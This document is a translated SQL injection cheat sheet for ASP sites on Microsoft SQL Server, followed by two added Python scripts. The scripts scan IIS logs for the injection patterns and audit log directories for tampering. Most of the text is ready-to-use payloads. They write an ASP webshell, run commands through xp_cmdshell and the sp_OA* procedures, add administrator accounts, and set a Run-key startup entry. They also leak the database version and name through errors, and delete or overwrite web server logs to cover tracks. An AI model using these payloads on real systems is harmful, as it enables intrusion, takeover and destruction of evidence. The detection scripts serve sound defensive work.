1. Writing an ASP one-line Trojan (webshell) file, using ^ as the cmd.exe escape character:
http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=vbscript runat=server^>execute request^("L"^)^</script^> >c:\mu.asp';--
echo ^<%execute^(request^("L"^)^)%^> >c:\mu.asp
2. Displaying the SQL Server version:
- http://192.168.1.5/display.asp?keyno=188 and 1=(select @@version)
- http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft VBScript compiler error '800A03F6'
Missing 'End'
/iishelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
/display.asp, line 17
3. While testing the Sony China website I could clearly tell that the vulnerability existed, but it did not fit any of the three types above. Then it occurred to me that SQL's IN keyword can be used in a query, for example "select * from MyTable where ID in (1)", where the value in parentheses is the data we submit; its result is exactly the same as that of "select * from MyTable where ID=1". So when the URL is visited with "1=1 and 1 in (1" appended, the original SQL statement becomes "select * from MyTable where ID in (1) and 1=1 and 1 in (1)", which returns the long-awaited page. Let us call this type "numeric IN" for now; you will surely have thought of the "character IN" type as well, which is caused by a query statement similar to "select * from MyTable where name in ('firstsee')".
4. Determining whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
To restore the xp_cmdshell extended stored procedure:
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','E:\inetput\web\xplog70.dll';--
5. Writing a command line to the Run (startup) registry key so that the program executes at startup:
http://192.168.1.5/display.asp?keyno=188;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test Ptlove /add'
6. Viewing the current database name:
- http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n), changing n to 0, 1, 2, 3, ... lets us walk across the databases.
- http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript compiler error '800A03F6'
Missing 'End'
/iishelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp, line 17
7. Listing all database names on the server:
select * from master.dbo.sysdatabases lists all columns of every record
select name from master.dbo.sysdatabases lists only the name column
8. Running cmd commands through a SQL Server injection vulnerability when xp_cmdshell is not available (using the sp_OA* OLE Automation stored procedures instead):
CREATE TABLE mytmp (info VARCHAR(400), id INT IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT
EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c dir c:\ >c:\temp.txt', '0', 'true'
-- note: the 'true' argument to run means wait for the program to finish; it is required for long-running commands such as ping.
EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT
EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt'
-- because FSO's OpenTextFile method returns a TextStream object, @file is now an object token
WHILE @shell > 0
BEGIN
    EXEC sp_OAMethod @file, 'ReadLine', @out OUT
    INSERT INTO mytmp (info) VALUES (@out)
    EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT
    IF @isEnd = 1 BREAK
    ELSE CONTINUE
END
DROP TABLE mytmp
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT
EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /w3svc/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" >c:\temp.txt', '0', 'true'
EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT
EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt'
WHILE @shell > 0
BEGIN
    EXEC sp_OAMethod @file, 'ReadLine', @out OUT
    INSERT INTO mytmp (info) VALUES (@out)
    EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT
    IF @isEnd = 1 BREAK
    ELSE CONTINUE
END
The following, on a single line, adds the web user to the Administrators group:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c cscript c:\inetpub\adminscripts\adsutil.vbs set /w3svc/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" >c:\temp.txt', '0', 'true' EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt' WHILE @shell > 0 BEGIN EXEC sp_OAMethod @file, 'ReadLine', @out OUT INSERT INTO mytmp (info) VALUES (@out) EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT IF @isEnd = 1 BREAK ELSE CONTINUE END
The following, on a single line, executes an EXE program:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\ >c:\temp.txt', '0', 'true' EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt' WHILE @shell > 0 BEGIN EXEC sp_OAMethod @file, 'ReadLine', @out OUT INSERT INTO mytmp (info) VALUES (@out) EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT IF @isEnd = 1 BREAK ELSE CONTINUE END
9. Three ways to execute a cmd command under SQL Server:
First, deleting the 7.18 log (ex050718.log):
(1) exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2) DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt', '0', 'true' EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt' WHILE @shell > 0 BEGIN EXEC sp_OAMethod @file, 'ReadLine', @out OUT INSERT INTO mytmp (info) VALUES (@out) EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT IF @isEnd = 1 BREAK ELSE CONTINUE END
(3) First turn on Jet sandbox mode. This is done by modifying the registry through the xp_regwrite extended stored procedure, which is why an administrator cannot prevent it by restricting registry modification alone. For security reasons sandbox mode is off by default, which is why xp_regwrite is needed; xp_regwrite requires at least db_owner permission, and for convenience it is recommended that you test with sysadmin permission:
- EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
Note: SandboxMode values:
0 = disable everything (default)
1 = enable Access, but disable others
2 = disable Access, but enable others
3 = enable everything
- Only the commands used under sysadmin permission are given here:
SELECT * FROM OPENROWSET('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin Admin1234 /add")')
- Reference command for establishing a linked server 'l0op8ack':
EXEC sp_addlinkedserver 'l0op8ack','OLE DB Provider for Jet','microsoft.jet.oledb.4.0','c:\windows\system32\ias\ias.mdb'
- How to use a linked database:
It can be done this way, but unfortunately db_owner permission is not sufficient; at least sysadmin, or the securityadmin + setupadmin combination, is required:
sp_addlinkedserver requires sysadmin or setupadmin permission
sp_addlinkedsrvlogin requires sysadmin or securityadmin permission
The final finding is that an sa or setupadmin + securityadmin account has to be used.
Generally no administrator grants a normal account such permissions,
so the practicality is limited; treat this only as a learning summary.
The approximate process is as follows. If the account is not sysadmin, permission validation on ias.mdb fails;
when I tested, granting the user hacker setupadmin + securityadmin permission still failed to use ias.mdb.
You need to find an MDB that an ordinary user can access:
- Create the new linked server "l0op8ack": EXEC sp_addlinkedserver 'l0op8ack','jetoledb','microsoft.jet.oledb.4.0','C:\winnt\system32\ias\ias.mdb';--
- exec sp_addlinkedsrvlogin 'l0op8ack','false';-- or
exec sp_addlinkedsrvlogin 'l0op8ack','false',NULL,'test1','ptlove';
- SELECT * FROM OPENQUERY(l0op8ack,'select shell("cmd.exe /c net user")');--
- exec sp_droplinkedsrvlogin 'l0op8ack','false';--
- exec sp_dropserver 'l0op8ack';--
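Every primitive shown in sections 1 through 9 above is carried in the query string of an ordinary GET request, so each one is written to the IIS W3C log that the log-deletion step in section 9 targets. The following Python script is an added example, not code from the original page: it reads such log lines, takes the field order from the #Fields header, percent-decodes cs-uri-query twice (to unwrap double encoding) and matches it against signatures for each primitive the page shows, stacked ;exec, xp_cmdshell, the sp_OA* OLE Automation procedures, xp_regwrite, OPENROWSET and linked-server calls, the convert(int,@@version) error channel, sysobjects/sysdatabases enumeration, and the numeric and IN boolean probes from section 3. The log lines, client addresses and rule names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection primitives described on this page, matched against the
# decoded query string. The rule names are ours; the tokens come from the page's examples.
SIGNATURES = {
    "stacked_query_exec":  re.compile(r";\s*exec\b", re.I),
    "xp_cmdshell":         re.compile(r"\bxp_cmdshell\b", re.I),
    "ole_automation":      re.compile(r"\bsp_oa(create|method|getproperty)\b", re.I),
    "registry_write":      re.compile(r"\bxp_reg(write|read|delete\w*)\b", re.I),
    "jet_linked_server":   re.compile(r"\b(openrowset|openquery|sp_addlinkedserver|sp_addlinkedsrvlogin)\b", re.I),
    "error_based_convert": re.compile(r"\bconvert\s*\(\s*int\b|@@version|\bdb_name\s*\(", re.I),
    "catalog_enumeration": re.compile(r"\bsys(objects|databases)\b", re.I),
    "boolean_probe":       re.compile(r"\band\s+\d+\s*(=|<>)\s*\d+|\band\s+\d+\s+in\s*\(", re.I),
}

# Constructed sample of an IIS 5 W3C log (not from the page); a short #Fields list is used.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-18 14:22:05 10.0.0.7 GET /display.asp keyno=188+and+1=convert(int,@@version)-- 500
2005-07-18 14:22:31 10.0.0.7 GET /display.asp keyno=188+and+1=(select+count(*)+from+master.dbo.sysobjects+where+name='xp_cmdshell') 200
2005-07-18 14:23:02 10.0.0.7 GET /display.asp keyno=188;exec+master.dbo.xp_cmdshell+'dir' 500
2005-07-18 14:25:40 10.0.0.7 GET /display.asp keyno=188;DECLARE+%2540shell+INT+EXEC+sp_OACreate+'Wscript.Shell',%2540shell+output 500
2005-07-18 14:26:12 10.0.0.9 GET /display.asp keyno=188 200
2005-07-18 14:27:30 10.0.0.9 GET /news/show1.asp NewsId=125272 200
"""


def decode_query(raw):
    """IIS writes '-' for an empty query; decode twice so %2540 -> %40 -> @ is caught."""
    if raw == "-":
        return ""
    return unquote_plus(unquote_plus(raw))


def classify(query):
    """Names of every signature that fires on one decoded query string, in table order."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(text):
    """Walk a W3C log; return one finding per line whose query matches at least one rule."""
    findings = []
    fields = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # field order is declared by the log itself
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                           # malformed or truncated line
        rec = dict(zip(fields, parts))
        hits = classify(decode_query(rec.get("cs-uri-query", "-")))
        if hits:
            findings.append({
                "line": lineno,
                "client": rec.get("c-ip"),
                "stem": rec.get("cs-uri-stem"),
                "status": rec.get("sc-status"),
                "rules": hits,
            })
    return findings


def suspicious_clients(findings, min_rules=2):
    """Clients that triggered at least `min_rules` distinct signatures across the log."""
    seen = {}
    for f in findings:
        seen.setdefault(f["client"], set()).update(f["rules"])
    return sorted(ip for ip, rules in seen.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['client']} {f['stem']} status={f['status']} rules={','.join(f['rules'])}")
    print("clients with several primitives:", suspicious_clients(scan_log(SAMPLE_LOG)))
```

A real deployment would stream the ex*.log files rather than a string, and the status column is worth keeping in the output: the error-based requests in sections 2 and 6 only work when the server returns the 500 page with the ODBC message, so a run of 500s from one client on a page that otherwise returns 200 is itself a signal, and custom error pages remove that channel.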
Another test, replacing the 7.18 log file with another day's file:
(1) exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2) DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log c:\winnt\system32\logfiles\w3svc5\ex050718.log >c:\temp.txt', '0', 'true' EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt' WHILE @shell > 0 BEGIN EXEC sp_OAMethod @file, 'ReadLine', @out OUT INSERT INTO mytmp (info) VALUES (@out) EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT IF @isEnd = 1 BREAK ELSE CONTINUE END
(3) DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT EXEC sp_OAMethod @shell, 'run', NULL, 'cmd.exe /c net user >c:\temp.txt', '0', 'true' EXEC sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT EXEC sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'c:\temp.txt' WHILE @shell > 0 BEGIN EXEC sp_OAMethod @file, 'ReadLine', @out OUT INSERT INTO mytmp (info) VALUES (@out) EXEC sp_OAGetProperty @file, 'AtEndOfStream', @isEnd OUT IF @isEnd = 1 BREAK ELSE CONTINUE END
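Section 9 and the follow-up above show two ways the W3SVC5 daily log for 2005-07-18 is tampered with: deleted outright, or overwritten with a copy of ex050716.log. Both leave traces in the log directory itself. The following Python script is an added example, not part of the original page, that audits an IIS log directory for exactly those traces: a gap in the exYYMMDD.log daily sequence, two files with identical SHA-256 hashes, and a file whose first entry carries a different date from its filename (the copied-over file still says 2005-07-16 inside). The directory contents are constructed inline as a fixture; the audit logic is ours and assumes the IIS 5/6 daily naming pattern exYYMMDD.log seen in the page's ex050718.log.

```python
import hashlib
import os
import re
import tempfile
from datetime import date, timedelta

# IIS 5/6 daily W3C log naming, exYYMMDD.log: the page's ex050718.log is 2005-07-18.
NAME_RX = re.compile(r"^ex(\d{2})(\d{2})(\d{2})\.log$", re.I)


def date_from_name(name):
    """Date encoded in an exYYMMDD.log filename, or None for any other file."""
    m = NAME_RX.match(name)
    if not m:
        return None
    yy, mm, dd = (int(x) for x in m.groups())
    return date(2000 + yy, mm, dd)


def first_entry_date(path):
    """Date field of the first non-comment W3C line, or None if there are no entries."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for line in fh:
            if line.startswith("#") or not line.strip():
                continue
            try:
                return date.fromisoformat(line.split()[0])
            except ValueError:
                return None
    return None


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_log_dir(dirpath):
    """Report sequence gaps, byte-identical files and filename/content date mismatches."""
    files = {}
    for name in os.listdir(dirpath):
        d = date_from_name(name)
        if d is not None:
            files[name] = d
    report = {"missing": [], "duplicates": [], "date_mismatch": []}
    if not files:
        return report

    # 1. A deleted day leaves a hole in the otherwise continuous daily sequence.
    present = set(files.values())
    cur, last = min(present), max(present)
    while cur <= last:
        if cur not in present:
            report["missing"].append(cur.isoformat())
        cur += timedelta(days=1)

    # 2. One day's log copied over another yields two byte-identical files.
    by_hash = {}
    for name in sorted(files):
        by_hash.setdefault(sha256_file(os.path.join(dirpath, name)), []).append(name)
    report["duplicates"] = [tuple(names) for names in by_hash.values() if len(names) > 1]

    # 3. The copied file still carries the original day's date in its entries.
    for name in sorted(files):
        inner = first_entry_date(os.path.join(dirpath, name))
        if inner is not None and inner != files[name]:
            report["date_mismatch"].append((name, inner.isoformat()))
    return report


def build_sample_dir():
    """Constructed fixture: logs for the 15th, 16th and 18th; the 17th has been deleted
    and the 18th is a copy of the 16th, mirroring the two tampering steps on this page."""
    header = "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    day16 = header + "2005-07-16 08:00:01 10.0.0.9 GET /display.asp keyno=5 200\n"
    sample = {
        "ex050715.log": header + "2005-07-15 08:00:01 10.0.0.9 GET /display.asp keyno=4 200\n",
        "ex050716.log": day16,
        "ex050718.log": day16,
    }
    tmp = tempfile.mkdtemp(prefix="w3svc_audit_")
    for name, body in sample.items():
        with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return tmp


if __name__ == "__main__":
    for key, value in audit_log_dir(build_sample_dir()).items():
        print(key, value)
```

The checks are cheap enough to run daily from a scheduled task against the live log directory, but they only help if the result goes somewhere the web server's account cannot reach: an attacker with the xp_cmdshell or sp_OA* primitives from sections 8 and 9 can alter any file that account can write, so shipping the logs off the host (or at least hashing them to a location that account cannot touch) is what makes the comparison trustworthy.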